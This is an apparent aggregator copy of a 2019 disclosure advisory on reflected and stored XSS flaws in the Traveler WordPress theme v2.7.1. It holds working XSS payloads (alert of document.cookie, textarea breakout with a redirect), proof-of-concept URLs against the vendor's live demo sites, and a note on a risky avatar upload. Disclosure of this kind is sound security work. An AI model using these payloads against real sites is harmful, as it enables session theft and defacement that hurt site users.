Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1598169 漏洞类型
发布时间 2019-05-07 更新时间 2019-05-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050064
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7.1 Reflected & Stored XSS Injections
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7.1
  
[?] :: Technical Details & Description:
# Weak security measures like bad input & textarea fields data filtering has been discovered in the «Traveler - Travel Booking WordPress Theme». Current version of this WordPress premium theme is 2.7.1.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend #1: https://carmap.travelerwp.com/
# Backend #1: https://carmap.travelerwp.com/page-user-setting/
# Frontend #2: https://remap.travelerwp.com/
# Backend #2: https://remap.travelerwp.com/page-user-setting/

[!] :: Special Note:
# 5.869 Sales
# «Change Avatar» upload field works really strange. F.e., u can upload any .PHP file with extension .php.png and break profile page (Server will respond with Error #500). Another possible issue is Null Byte Injection in PHP, but on the demo website any access to uploaded file will be blocked by CloudFlare.
# On the «Google Chrome» browser reflected XSS isn't work cause of built-in browser security measures, better use «Mozilla» or «Opera» instead.

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# https://carmap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/page-user-setting/
# https://remap.travelerwp.com/st_rental/midtown-manhattan-oversized/
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
# https://remap.travelerwp.com/?s="><img src=x onerror=alert(`QUIXSS`)>
# https://remap.travelerwp.com/?s=%22%3E%3Cinput%20type=text%20autofocus%20onfocus=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection use default WordPress search on the demo website https://remap.travelerwp.com/?s=[payload]
# Sample payload #1: "><img src=x onerror=alert(document.cookie)>
# Sample payload #2: <input type=text autofocus onfocus=alert(document.cookie)>

[+] :: PoC [Stored XSS Injection]:
# Go to the demo website https://carmap.travelerwp.com and register a new account (there is no validation or activation process) and then log in to your account. Go to https://carmap.travelerwp.com/page-user-setting/ page next. All input fields except «Username» and «E-mail» can be used for Stored XSS Injections, for test u can use any payload started from "> just to «close» input field and </textarea> to «close» the text box. Save the data and your payload(s) will be successfully injected.
# Same logic works for any other theme options: «Checkout» page https://remap.travelerwp.com/checkout/ with multiple vulnerable input fields, «Write Review» page https://remap.travelerwp.com/page-user-setting/?sc=write_review&item_id=1084 etc. etc.
# Sample payload #1: "><script>alert('QUIXSS')</script>
# Sample payload #2: </textarea><img src="x" onerror="window.location.replace('https://twitter.com/quixss');">